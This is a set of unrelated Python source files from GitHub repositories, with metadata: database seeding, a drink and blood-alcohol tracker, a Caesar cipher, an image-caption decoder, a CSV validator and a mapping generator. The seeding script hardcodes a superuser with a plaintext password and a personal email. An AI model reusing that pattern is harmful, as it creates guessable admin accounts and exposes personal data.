QCategory(name=c,parent=c7)\n for c in nairabricks:\n q = QCategory(name=c,parent=c8)\n DBSession.add_all([c1,c2,c3,c4,c5,c6,c7,c8])\n'''\n\ndef populate_features():\n external = Feature_types(u'External Features')\n internal = Feature_types(u'Internal Features')\n eco = Feature_types(u'Eco Features')\n other = Feature_types(u'Other Features')\n\n oth = [u'Pets Allowed', u'Disability Features',u'Waterfront', u'Water View',\n u'Ocean View', u'River View',u'Hill/Mountain View', 
u'Development Projects']\n inter = [u'Alarm System', u'Intercom',u'Ensuite', u'Dishwasher',\n u'Built-in wardrobes', u'Ducted vacuum system',u'Gym', u'Indoor spa',\n u'Floorboards', u'Broadband internet available',u'Pay TV access', u'Fireplace',\n u'Ducted', u'heating', u'Ducted cooling',u'Split-system heating',\n u'Hydronic heating',u'Air conditioning', u'Gas heating',u'Lift']\n ext =[u'Carport', u'Garage',u'Open car spaces', u'Remote garage',\n u'Secure parking', u'Swimming pool',u'Tennis court', u'Balcony',\n u'Deck', u'Courtyard',u'Outdoor entertaining area', u'Fully fenced']\n ec = [u'Solar panels', u'Solar hot water',u'Water tank', u'Grey water system',\n u'High Energy efficiency rating', u'Medium Energy efficiency rating',\n u'Low - Energy efficiency rating']\n with transaction.manager:\n for c in inter:\n indoor = Features(name=c)\n DBSession.add(indoor)\n internal.features.append(indoor)\n for e in ext:\n outdoor = Features(name=e)\n DBSession.add(outdoor)\n external.features.append(outdoor)\n for i in ec:\n ecof = Features(name=i)\n DBSession.add(ecof)\n eco.features.append(ecof)\n for o in oth:\n othr = Features(name=o)\n DBSession.add(othr)\n other.features.append(othr)\n DBSession.add_all([external,internal,eco])\n transaction.commit()\n'''\ndef Populate_FeatureToRate():\n env = FeatureToRate(name=u'Environment')\n com = FeatureToRate(name=u'Commuting')\n place = FeatureToRate(name=u'Places of Interest')\n\n d = [u'Roads',u'Safety',u'Cleanliness',u'Neighborhood']\n c = [u'Public Transport',u'Parking',u'Connectivity',u'Traffic']\n e =[u'Schools',u'Restaurants',u'Hospital',u'Market']\n with transaction.manager:\n for i in d:\n enviro = FeatureToRate(name=i, parent=env)\n for i in c:\n come = FeatureToRate(name=i, parent=com)\n for i in e:\n s = FeatureToRate(name=i, parent=place)\n DBSession.add_all([env,com,place])\n transaction.commit()\n'''\n\ndef populate_superuser():\n admin = Users(\n firstname = u\"Ephraim\",\n surname = u\"Anierobi\",\n password = u\"mypassword\",\n email = u\"splendidzigy24@gmail.com\",\n company_name=u\"Zebraware Group Ltd\",\n prefix = u\"Zebraware\",\n email_verified = True\n )\n group1 = Groups(name=u\"superadmin\", description=u\"Last Admin\")\n group2 = Groups(name=u\"admin\", description=u\"Admin\")\n group3 = Groups(name=u\"supermod\",description=u\"Super moderator\")\n group4 = Groups(name=u\"mod\", description=u\"Moderator\")\n with transaction.manager:\n DBSession.add_all([group1,group2,group3,group4])\n admin.mygroups.append(group1)","repo_name":"FrankOdey/nairabricks","sub_path":"buddy/models/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":11233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32861204942","text":"import sqlite3\nimport time\n\nclass Drink():\n\tdef __init__(self,mass,gender,quantity,ABV,at_time,name):\n\t\tself.name = name\n\t\tself.mass = mass #in grams\n\t\tself.gender = gender\n\t\tself.quantity = quantity\n\t\tself.ABV = ABV\n\t\tself.at_time = at_time\n\t\tself.removed = False\n\n\tdef getCurrent(self):\n\t\t#A = self.grams_alcohol\n\t\tA = (self.quantity * (self.ABV/100.0)) * 23.35\n\t\tW = self.mass\n\t\tif self.gender == 'Female':\n\t\t\tR = 0.55\n\t\telse:\n\t\t\tR = 0.68\n\t\tH = (time.mktime(time.localtime()) - time.mktime(self.at_time)) / 3600\n\t\tBAC = (((A)/(W*R))*100)-(H*.015)\n\t\tval = str(BAC)\n\t\ttry:\n\t\t\tval = float(val[:7])\n\t\texcept:\n\t\t\tval = 0\n\t\tif val < 0:\n\t\t\treturn 0\n\t\tval = 
round(val*1000)/1000.0\n\t\treturn val\n\t\n\tdef getInitial(self):\n\t\t#A = self.grams_alcohol\n\t\tA = (self.quantity * (self.ABV/100.0)) * 23.35\n\t\tW = self.mass\n\t\tif self.gender == 'Female':\n\t\t\tR = 0.55\n\t\telse:\n\t\t\tR = 0.68\n\t\tH = (time.mktime(time.localtime()) - time.mktime(self.at_time)) / 3600\n\t\tBAC = (((A)/(W*R))*100)\n\t\tBAC = round(BAC*1000)/1000.0\n\t\treturn BAC\n\t\n\t\n\tdef __str__(self):\n\t\treturn \"{4}: {0} oz. of \\\"{3}\\\" at {1}% ABV added {2} to your BAC.\".format(\n\t\t\tself.quantity,\n\t\t\tself.ABV,\n\t\t\tself.getInitial(),\n\t\t\tself.name,\n\t\t\ttime.strftime(\"%H:%M:%S\",self.at_time))\n\ncreate_drink_table = \"\"\"\nCREATE TABLE IF NOT EXISTS drinks(\n\tdrink_id INT PRIMARY KEY,\n\tsession_id INT,\n\tdrinker_gender INT,\n\tdrinker_mass INT,\n\tdrink_quantity REAL,\n\tdrink_ABV REAL,\n\tdrink_name TEXT,\n\tdrink_removed INT);\"\"\"\n\ninsert_drink = \"\"\"INSERT INTO drinks VALUES(?,?,?,?,?,?,?,?)\"\"\"\n\nget_drink = \"\"\"SELECT * FROM drinks WHERE drink_id=?\"\"\"\n\nupdate_drink = \"\"\"UPDATE drinks SET\n\tdrinker_gender=?,\n\tdrinker_mass=?,\n\tdrink_quantity=?,\n\tdrink_ABV=?,\n\tdrink_name=?,\n\tdrink_removed=?\n\tWHERE drink_id=?\"\"\"\n\nget_sessions = \"SELECT DISTINCT session_id FROM drinks\"\n\nget_session = \"SELECT * FROM drinks WHERE session_id=?\"\n\nlast_session = \"SELECT session_id FROM drinks ORDER BY session_id DESC LIMIT 1\"\n\ndbname = '/drinks.db'\n\ndef Build_DB(location):\n\tcon = sqlite3.connect(location + dbname)\n\tc = con.cursor()\n\tc.execute(create_drink_table)\n\tcon.commit()\n\tc.close()\n\tcon.close()\n\ndef save(session_start,drink_list,location):\n\tBuild_DB(location)\n\tprint(\"Location:\", location)\n\tcon = sqlite3.connect(location+dbname)\n\tc = con.cursor()\n\tdrinks = {}\n\tprint(\"saving drinks\")\n\tfor drink in drink_list:\n\t\tremoved = 0\n\t\tif drink.removed:\n\t\t\tremoved = 1\n\t\t\t\n\t\tgender = 1\n\t\tif drink.gender == 'Male':\n\t\t\tgender = 0\n\t\t\n\t\tmass = drink.mass\n\t\toz = drink.quantity\n\t\tabv = drink.ABV\n\t\tname = drink.name\n\t\tdrink_id = time.strftime(\"%Y%m%d%H%M%S\",drink.at_time)\n\t\tprint(\"Saving drink: \", drink_id)\n\n\t\tc.execute(get_drink,(drink_id,))\n\t\ttry:\n\t\t\tif len(c.fetchall()) > 0:\n\t\t\t\tc.execute(update_drink,\n\t\t\t\t\t(gender,\n\t\t\t\t\tmass,\n\t\t\t\t\toz,\n\t\t\t\t\tabv,\n\t\t\t\t\tname,\n\t\t\t\t\tremoved,\n\t\t\t\t\tdrink_id))\n\t\t\telse:\n\t\t\t\tc.execute(insert_drink,\n\t\t\t\t\t(drink_id,\n\t\t\t\t\ttime.strftime(\"%Y%m%d%H%M%S\",session_start),\n\t\t\t\t\tgender,\n\t\t\t\t\tmass,\n\t\t\t\t\toz,\n\t\t\t\t\tabv,\n\t\t\t\t\tname,\n\t\t\t\t\tremoved))\n\t\t\tprint(\"saved drink: \", str(drink))\n\t\texcept sqlite3.IntegrityError as ie:\n\t\t\tprint(\"id collision. 
probably drink button spam.\",ie,drink_id)\n\t\tcon.commit()\n\tc.close()\n\ndef load(location,session_id=None):\n\tpass\n\ndef load_last(location):\n\tcon = sqlite3.connect(location + dbname)\n\tc = con.cursor()\n\ttry:\n\t\tc.execute(last_session)\n\texcept sqlite3.OperationalError as oe:\n\t\tprint(\"No table, must be first run.\")\n\t\treturn (None,[])\n\tret = []\n\tsid = None\n\ttry:\n\t\tsid = c.fetchone()[0]\n\t\tprint(\"sid: \", sid)\n\t\tc.execute(get_session,(sid,))\n\t\tfor row in c.fetchall():\n\t\t\tdrink = Drink(row[3],row[2],row[4],row[5],time.strptime(str(row[0]),\"%Y%m%d%H%M%S\"),row[6])\n\t\t\tif row[7]:\n\t\t\t\tdrink.removed = True\n\t\t\tif not drink.removed:\n\t\t\t\tret.append(drink)\n\t\t\tprint(str(drink),drink.removed)\n\texcept Exception as e:\n\t\tprint(\"Hit an error: \",e)\n\tc.close()\n\tcon.close()\n\treturn (sid,ret)\n\ndef get_Sessions(location):\n\tpass\n","repo_name":"Narcolapser/Flight-Night","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32491972859","text":"\"\"\"\nAll functions to help manipulate data.\n\n\nSuch types of files we use to create some functions to manipulate with data, etc.\n\"\"\"\n\n\ndef get_list_of_values_from_dictionary(list_of_matched_areas: list[dict], key: str) -> list[str]:\n \"\"\"\n Get all id's values in list\n :param locator: barrier or segment id, tollRateId, CalculatedAmount\n :param list_of_matched_areas: list of barriers or segments or tollDto\n :return: id of trips\n \"\"\"\n ids = []\n for value in list_of_matched_areas:\n ids.append(value[key])\n return ids\n","repo_name":"Viktoraspr/test_code_structure","sub_path":"methods/helpers_functions.py","file_name":"helpers_functions.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74749776441","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 27 04:05:33 2020\r\n\r\n@author: asumon\r\n\"\"\"\r\n\r\n##CAESER CIPHER Encoding and Decoding process\r\n\r\nalphabet=['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',\r\n 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x',\r\n 'y', 'z','A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J',\r\n 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\r\n\r\n\r\n\r\n'''\r\ndirection=input(\"Type 'Encode' to Encrypt, type 'decode' to decrypt:\\n\")\r\n\r\ntext=input(\"Please type your Message:\\n\").lower()\r\n\r\nshift=int(input(\"Type the shift number:\\n\"))\r\n\r\n\r\n#def encrypt():\r\n \r\n \r\n \r\ndef encrypt(plain_text,shift_amount):\r\n cipher_text=\"\"\r\n for letter in plain_text:\r\n position=alphabet.index(letter)\r\n new_position=position+shift_amount\r\n new_letter=alphabet[new_position]\r\n cipher_text += new_letter\r\n print(f\"The Encoded Text is : {cipher_text}\")\r\n \r\n \r\n#encrypt(text,shift)\r\n\r\n\r\ndef decrypt(cipher_text,shift_amount):\r\n plain_text=\"\"\r\n for letter in cipher_text:\r\n position=alphabet.index(letter)\r\n new_position=position-shift_amount\r\n plain_text += alphabet[new_position]\r\n print(f\"Decoded text : {plain_text}\")\r\n \r\nif direction=='encode':\r\n encrypt(plain_text=text, shift_amount=shift)\r\nelif direction=='decode':\r\n decrypt(cipher_text=text, shift_amount=shift)\r\n \r\n'''\r\n \r\n \r\n## IN DIFFERENT WAY TO DO THIS CODE \r\n\r\n#import art Add the ASCII 
LOGO\r\n\r\n\r\n \r\ndef caeser_cipher(start_text,shift_amount,cipher_direction):\r\n    end_text =\"\"\r\n    #for letter in start_text:\r\n        #position=alphabet.index(letter)\r\n    if cipher_direction=='decode':\r\n        shift_amount *= -1\r\n    for char in start_text:\r\n        if char in alphabet:\r\n            position=alphabet.index(char)\r\n            new_position= position +shift_amount\r\n            end_text += alphabet[new_position]\r\n        else:\r\n            end_text += char\r\n        \r\n    print(f\"Here is the Cipher Text based on {cipher_direction}d and the Text is: {end_text}\")\r\n\r\n\r\n\r\nshould_continue=True\r\nwhile should_continue:\r\n    direction=input(\"Type 'Encode' to Encrypt, type 'decode' to decrypt:\\n\")\r\n    text=input(\"Please type your Message:\\n\").lower()\r\n    shift=int(input(\"Type the shift number:\\n\"))\r\n    shift=shift % 26\r\n    caeser_cipher(start_text=text, shift_amount=shift, cipher_direction=direction) \r\n    result=input(\"Do you want to continue Yes or No :\")\r\n    if result=='no':\r\n        should_continue=False\r\n        print(\"GOOD BYE\")\r\n\r\n    \r\n\r\n\r\n    \r\n    \r\n    \r\n    ","repo_name":"asumon/Python","sub_path":"caeser_cipher.py","file_name":"caeser_cipher.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"35370593120","text":"import torch\nfrom torch import nn\nfrom AttentionNetwork import AttentionNetwork\n\nclass DecoderWithAttention(nn.Module):\n\n    def __init__(self, attention_dimension, embedding_dimension, decoder_dimension, vocab_size, device = torch.device(\"cpu\"), encoder_dimension=2048, dropout_fraction=0.5):\n        super(DecoderWithAttention, self).__init__()\n        \n        self.device = device\n        self.vocab_size = vocab_size\n\n        self.attention = AttentionNetwork(encoder_dimension, decoder_dimension, attention_dimension) \n        self.embedding = nn.Embedding(vocab_size, embedding_dimension) \n        self.dropout = nn.Dropout(p=dropout_fraction)\n        self.decode_step = nn.LSTMCell(embedding_dimension + encoder_dimension, decoder_dimension, bias=True) \n        self.init_h = nn.Linear(encoder_dimension, decoder_dimension) \n        self.init_c = nn.Linear(encoder_dimension, decoder_dimension) \n        self.f_beta = nn.Linear(decoder_dimension, encoder_dimension)\n        self.sigmoid = nn.Sigmoid()\n        self.fc = nn.Linear(decoder_dimension, vocab_size) \n        self.init_weights() \n\n\n    def init_weights(self):\n        self.embedding.weight.data.uniform_(-0.1, 0.1)\n        self.fc.bias.data.fill_(0)\n        self.fc.weight.data.uniform_(-0.1, 0.1)\n\n\n    def load_pretrained_embeddings(self, embeddings):\n        self.embedding.weight = nn.Parameter(embeddings)\n\n\n    def fine_tune_embeddings(self, fine_tune=True):\n        for p in self.embedding.parameters():\n            p.requires_grad = fine_tune\n\n\n    def init_hidden_state(self, encoder_out):\n        mean_encoder_out = encoder_out.mean(dim=1)\n        h = self.init_h(mean_encoder_out) \n        c = self.init_c(mean_encoder_out)\n        return h, c\n\n\n    def forward(self, encoder_out, encoded_captions, caption_lengths): \n        batch_size = encoder_out.size(0)\n        encoder_dimension = encoder_out.size(-1)\n\n        encoder_out = encoder_out.view(batch_size, -1, encoder_dimension) \n        num_pixels = encoder_out.size(1)\n\n        embeddings = self.embedding(encoded_captions) \n\n        h, c = self.init_hidden_state(encoder_out) \n\n        decode_lengths = (caption_lengths-1).tolist()\n\n        \n        predictions = torch.zeros(batch_size, max(decode_lengths), self.vocab_size).to(self.device)\n        alphas = torch.zeros(batch_size, max(decode_lengths), num_pixels).to(self.device)\n\n        for t in range(max(decode_lengths)):\n            batch_size_t = sum([l > t 
for l in decode_lengths])\n \n attention_weighted_encoding, alpha = self.attention(encoder_out[:batch_size_t],\n h[:batch_size_t])\n \n gate = self.sigmoid(self.f_beta(h[:batch_size_t]))\n attention_weighted_encoding = gate * attention_weighted_encoding\n h, c = self.decode_step(\n torch.cat([embeddings[:batch_size_t, t, :], attention_weighted_encoding], dim=1),\n (h[:batch_size_t], c[:batch_size_t]))\n\n preds = self.fc(self.dropout(h))\n predictions[:batch_size_t, t, :] = preds\n alphas[:batch_size_t, t, :] = alpha\n\n\n return predictions, encoded_captions, decode_lengths, alphas","repo_name":"Nobbettt/DiffusionDBPromptCapture","sub_path":"DecoderWithAttention.py","file_name":"DecoderWithAttention.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13613165564","text":"import json\nimport csv\nfrom os.path import exists\n\n\ndef solution(X):\n # We assume X is a csv file\n categories = {\"real\", \"fake\", \"ambiguous\"}\n rows = []\n\n path = exists(X)\n\n # check if X is actually a file, if not return an error\n if path == False:\n raise ValueError(\"File does not exist\")\n\n with open(X, newline='') as csvfile:\n csv_reader = csv.reader(csvfile, delimiter=',')\n row_values = list(map(tuple, csv_reader))\n\n # Must have 4 columns\n if len(row_values[0]) != 4:\n raise ValueError(\"Number of columns must equal 4\")\n\n (experiment_name, sample_id, fauxness, category_guess) = row_values[0]\n\n # Check to see if headers match\n if experiment_name == 'experiment_name' and sample_id == 'sample_id' and fauxness == 'fauxness' and category_guess == 'category_guess':\n headers = row_values[0]\n del row_values[0]\n for row in row_values:\n # Check to make sure we still have 4 columns per row.\n if len(row) != 4:\n raise ValueError(\"Number of columns must equal 4\")\n\n (experiment_name, sample_id, fauxness, category_guess) = row\n\n # validation\n\n if experiment_name == \"\":\n raise ValueError(\"experiment_name cannot be empty\")\n elif is_valid_sample_id(sample_id) == False:\n raise ValueError(\n \"sample_id must be a positive integer and must be whole numbers.\")\n elif is_valid_fauxness(fauxness) == False:\n raise ValueError(\n \"fauxness is not in the range of 0.0 and 1.0 inclusive.\")\n elif category_guess not in categories:\n raise ValueError(\n \"category_guess must be either real, fake, or ambigious.\")\n else:\n rows.append(row)\n\n # function calls to test below\n\n summaryData = display_summary_data(row_values)\n print(\"Summary Data: \", summaryData)\n\n print(\"JSON: \", display_json(row_values, headers, 0))\n\n print(\"CSV: \", display_csv(row_values, 0))\n print(\"In Memory: \", display_in_memory(row_values, 0))\n else:\n raise ValueError(\"Column headers are invalid.\")\n\n# int -> bool\n\n\ndef is_valid_sample_id(sample_id):\n if sample_id.isdigit() == False or int(sample_id) <= 0:\n return False\n else:\n return True\n\n# float -> bool\n\n\ndef is_valid_fauxness(fauxness):\n if float(fauxness) > 1.0 or float(fauxness) < 0.0:\n return False\n\n potentialFloat = fauxness.replace('.', '', 1).isdigit()\n return potentialFloat\n\n# return json representation of values\n\n\ndef display_json(list_of_tuple, headers, row_number):\n output = dict()\n for idx, key in enumerate(headers):\n output[key] = list_of_tuple[row_number][idx]\n jsonObj = json.dumps(output)\n return jsonObj\n\n# return csv representation of values\n\n\ndef display_csv(rows, row_number):\n csv_representation = 
\"\"\n for value in rows[row_number]:\n csv_representation += value + \",\"\n return csv_representation\n\n# return in memory representation of values\n\n\ndef display_in_memory(rows, row_number):\n return rows[row_number]\n\n# return summary data is json format\n\n\ndef display_summary_data(rows):\n return json.dumps(rows)\n\n\nsolution('path/to/fauxfile')\n","repo_name":"nimkamp/fauxilizer-5000","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42619459771","text":"#!/usr/bin/python3.6\nimport sys, warnings, operator\nfrom optparse import OptionParser\nfrom random import *\nfrom application import Application\n\ndef randomMapping(value):\n return randint(1,value)\n \ndef generateName(value):\n name = \"A\" + str(value)\n return name\n\ndef generateComputeName(value):\n name = \"compute\" + str(value)\n return name\n\ndef generateMapping(value):\n name = \"M\" + str(value)\n return name\n\ndef randomRate(dist):\n import random\n \n if (dist == \"uniform\"):\n # random.uniform(a, b)\n # Return a random floating point number N such that a <= N <= b for a <= b and b <= N <= a for b < a.\n return round(random.uniform(0.025,0.667),3)\n elif (dist == \"beta\"):\n # random.betavariate(alpha, beta)\n # Beta distribution. Conditions on the parameters are alpha > 0 and beta > 0. Returned values range between 0 and 1.\n return round(betavariate(0.025,0.667),3)\n elif (dist == \"expo\"):\n # random.expovariate(lambd)\n # Exponential distribution. lambd is 1.0 divided by the desired mean. It should be nonzero.\n return round(expovariate(0.667),3)\n elif (dist == \"gamma\"):\n # random.gammavariate(alpha, beta)\n # Gamma distribution. (Not the gamma function!) Conditions on the parameters are alpha > 0 and beta > 0.\n return round(gammavariate(0.025,0.667),3)\n elif (dist == \"gauss\"):\n # random.gauss(mu, sigma)\n # Gaussian distribution. mu is the mean, and sigma is the standard deviation.\n return round(gauss(0.025,0.667),3)\n elif (dist == \"pareto\"):\n # random.paretovariate(alpha)\n # Pareto distribution. alpha is the shape parameter.\n return round(paretovariate(0.025),3)\n elif (dist == \"weibull\"):\n # random.weibullvariate(alpha, beta)\n # Weibull distribution. 
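# (Illustrative check, outside this function: the distribution claims in the
#  comments above can be verified empirically -- random.expovariate(lambd)
#  has mean 1/lambd, so samples drawn at lambd=0.667 should average near 1.5:
#      samples = [random.expovariate(0.667) for _ in range(100_000)]
#      assert abs(sum(samples) / len(samples) - 1.5) < 0.05  # stochastic
#  )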
alpha is the scale parameter and beta is the shape parameter.\n return round(weibullvariate(0.025,0.667),3)\n\ndef output2STDOUT(appList, numA, numM):\n applicationList = appList\n numberApplications = numA\n numberMachines = numM\n print(\"// Rate Definitions\")\n print(\"// Rates starting with r are actual or original processing rates\")\n print(\"// Rates starting with p are perturbed processing rates\")\n for i in applicationList:\n print(i.string_rate(),i.string_perturbedRate())\n\n print(\"\\n\")\n print(\"// Application Definitions\")\n for i in applicationList:\n print(i.definition())\n\n print(\"\\n\")\n print(\"// Machine Definition\")\n for x in range(numberMachines):\n combinedString = \"\"\n machineNumber = x + 1\n rateString = \"\"\n perturbedRateString = \"\"\n for y in range(numberApplications):\n applicationNumber = y + 1\n if (generateMapping(machineNumber) == applicationList[y].get_mapping()):\n rateString = rateString + \"(compute\" + str(applicationNumber) + \", r\" + str(applicationNumber) + \").\"\n perturbedRateString = perturbedRateString + \"(compute\" + str(applicationNumber) + \", p\" + str(applicationNumber) + \").\"\n rateString = rateString + \"M\" + str(machineNumber)\n perturbedRateString = perturbedRateString + \"M\" + str(machineNumber)\n combinedString = \"M\" + str(machineNumber) + \" = \" + rateString + \" + \" + perturbedRateString + \";\"\n print(combinedString)\n\n print(\"\\n\")\n applicationString = \"(\"\n print(\"// System Equation for Mapping Definition\")\n for x in range(numberApplications):\n number = x + 1\n if (number < numberApplications):\n applicationString = applicationString + generateName(number) + \" <> \"\n else:\n applicationString = applicationString + generateName(number) + \")\"\n\n computeString = \"<\"\n for x in range(numberApplications):\n number = x + 1\n if (number < numberApplications):\n computeString = computeString + generateComputeName(number) + \", \"\n else:\n computeString = computeString + generateComputeName(number) + \">\"\n\n machineString = \"(\"\n for x in range(numberMachines):\n number = x + 1\n if (number < numberMachines):\n machineString = machineString + generateMapping(number) + \" <> \"\n else:\n machineString = machineString + generateMapping(number) + \")\"\n\n systemEquation = applicationString + \" \" + computeString + \" \" + machineString\n print(systemEquation)\n\ndef output2FILE(appList, numA, numM, filename):\n applicationList = appList\n numberApplications = numA\n numberMachines = numM\n outputfile = filename\n f = open(outputfile, \"w\")\n f.write(\"// Rate Definitions\\n\")\n f.write(\"// Rates starting with r are actual or original processing rates\\n\")\n f.write(\"// Rates starting with p are perturbed processing rates\\n\")\n for i in applicationList:\n my_rate = i.string_rate()\n my_perturbedRate = i.string_perturbedRate()\n my_string = my_rate + \" \" + my_perturbedRate + \"\\n\"\n f.write(my_string)\n\n f.write(\"\\n\")\n f.write(\"// Application Definitions\\n\")\n for i in applicationList:\n my_definition = i.definition()\n my_string = my_definition + \"\\n\"\n f.write(my_string)\n\n f.write(\"\\n\")\n f.write(\"// Machine Definition\\n\")\n for x in range(numberMachines):\n combinedString = \"\"\n machineNumber = x + 1\n rateString = \"\"\n perturbedRateString = \"\"\n for y in range(numberApplications):\n applicationNumber = y + 1\n if (generateMapping(machineNumber) == applicationList[y].get_mapping()):\n rateString = rateString + \"(compute\" + str(applicationNumber) + \", 
r\" + str(applicationNumber) + \").\"\n perturbedRateString = perturbedRateString + \"(compute\" + str(applicationNumber) + \", p\" + str(applicationNumber) + \").\"\n rateString = rateString + \"M\" + str(machineNumber)\n perturbedRateString = perturbedRateString + \"M\" + str(machineNumber)\n combinedString = \"M\" + str(machineNumber) + \" = \" + rateString + \" + \" + perturbedRateString + \";\"\n f.write(combinedString + \"\\n\")\n\n f.write(\"\\n\")\n applicationString = \"(\"\n f.write(\"// System Equation for Mapping Definition\\n\")\n for x in range(numberApplications):\n number = x + 1\n if (number < numberApplications):\n applicationString = applicationString + generateName(number) + \" <> \"\n else:\n applicationString = applicationString + generateName(number) + \")\"\n\n computeString = \"<\"\n for x in range(numberApplications):\n number = x + 1\n if (number < numberApplications):\n computeString = computeString + generateComputeName(number) + \", \"\n else:\n computeString = computeString + generateComputeName(number) + \">\"\n\n machineString = \"(\"\n for x in range(numberMachines):\n number = x + 1\n if (number < numberMachines):\n machineString = machineString + generateMapping(number) + \" <> \"\n else:\n machineString = machineString + generateMapping(number) + \")\"\n\n systemEquation = applicationString + \" \" + computeString + \" \" + machineString\n f.write(systemEquation + \"\\n\")\n f.close()\n\ndef main():\n\n if not sys.warnoptions:\n warnings.simplefilter(\"ignore\")\n usage = \"usage: %prog [options]\" \n parser = OptionParser(usage=usage, version=\"%prog v 0.1\")\n parser.add_option(\"-a\", \"--applications\", action=\"store\", dest=\"numberApplications\", help=\"number of applications [DEFAULT=20]\")\n parser.add_option(\"-m\", \"--machines\", action=\"store\", dest=\"numberMachines\", help=\"number of machines [DEFAULT=5]\")\n parser.add_option(\"-d\", \"--distribution\", action=\"store\", dest=\"distribution\", help=\"statistical distribution [DEFAULT=uniform]\")\n parser.add_option(\"-o\", \"--output\", action=\"store\", dest=\"outputName\", help=\"output file name [DEFAULT=STDOUT]\")\n parser.add_option(\"-c\", \"--constant\", action=\"store\", dest=\"constantFile\", help=\"use pregenerated set of applications, generate mappings [DEFAULT=NA]\")\n\n (options, args) = parser.parse_args()\n\n if (options.numberApplications):\n numberApplications = int(options.numberApplications)\n else:\n numberApplications = 20\n\n if (options.numberMachines):\n numberMachines = int(options.numberMachines)\n else:\n numberMachines = 5\n \n if (options.distribution):\n if (options.distribution == \"uniform\"):\n distribution = \"uniform\"\n elif (options.distribution == \"beta\"):\n distribution = \"beta\"\n elif (options.distribution == \"expo\"):\n distribution = \"expo\"\n elif (options.distribution == \"gamma\"):\n distribution = \"gamma\"\n elif (options.distribution == \"gauss\"):\n distribution = \"gauss\"\n elif (options.distribution == \"pareto\"):\n distribution = \"pareto\"\n elif (options.distribution == \"weibull\"):\n distribution = \"weibull\"\n else: \n distribution = \"uniform\"\n\n n = numberApplications # number of applications\n k = numberMachines # number of machines\n applicationList = [i+1 for i in range(n)]\n machineList = [i+1 for i in range(k)]\n\n # if k > n, or n < k...exit with message\n if (k > n): # if number of machines is greater than the number of applications\n print(\"ERROR: Invalid Option: #Machines > #Applications\")\n exit()\n \n 
elif (n < k): # if number of applications is less than the number of machines\n print(\"ERROR: Invalid Option: #Applications < #Machines\")\n exit()\n\n if (n < (2*k)):\n print(\"ERROR: Invalid Option: Need at Least 2 Applications per Machine\")\n exit()\n\n # initialize and/or n = k\n mySet = set([])\n while (len(mySet) < (2*k)):\n mySet.add(randrange(1,n+1))\n\n newList = list(mySet)\n perList = 2\n splitList = [newList[i * perList:(i + 1) * perList] for i in range((len(newList) + perList - 1) // perList )]\n myMappings = {} # empty dictionary\n myMachine = 1\n while (myMachine <= k):\n myMappings[myMachine] = splitList[myMachine -1]\n for element in (splitList[myMachine -1]):\n applicationList.remove(element)\n myMachine = myMachine + 1\n \n\n # finish mapping applications to machines\n myRange = len(applicationList)\n for item in applicationList:\n myMachine = randrange(1,k+1)\n tempList = myMappings[myMachine]\n tempList.append(item)\n myMappings[myMachine] = tempList\n\n masterApplicationList = []\n for machine in myMappings:\n myApplicationList = myMappings[machine]\n for application in myApplicationList:\n perturbed = 2.0\n normal = randomRate(distribution)\n while (perturbed > normal):\n perturbed = randomRate(distribution)\n\n myApplication = Application(application,generateName(application),normal,perturbed,generateComputeName(application),generateMapping(machine))\n output = myApplication.print_values()\n masterApplicationList.append(myApplication)\n \n \n masterApplicationList.sort(key=operator.attrgetter('key'))\n\n\n if (options.outputName):\n output2FILE(masterApplicationList, numberApplications, numberMachines, options.outputName)\n else: \n output2STDOUT(masterApplicationList, numberApplications, numberMachines)\n\nif __name__ == '__main__':\n main()","repo_name":"williamssanders/generateMappings","sub_path":"mappings.py","file_name":"mappings.py","file_ext":"py","file_size_in_byte":11519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"8745884881","text":"'''\nNote: this is effectively the exact same script as maps_submit_per_class but instead of using GTEx, using 151 Brain Cortex samples quantified with\nsalmon and RSEM. 
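# In mappings.py above, the seeding loop draws 2*k distinct application ids by
# retrying randrange() through a set; random.sample expresses the same
# without-replacement draw directly. A sketch (n and k as in main()):
from random import sample

def seed_assignments(n, k):
    chosen = sample(range(1, n + 1), 2 * k)      # 2*k distinct ids in one call
    # hand each machine two of the chosen applications, as splitList does above
    return {m + 1: chosen[2 * m:2 * m + 2] for m in range(k)}

# e.g. seed_assignments(20, 5) -> {1: [id, id], 2: [id, id], ..., 5: [id, id]}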
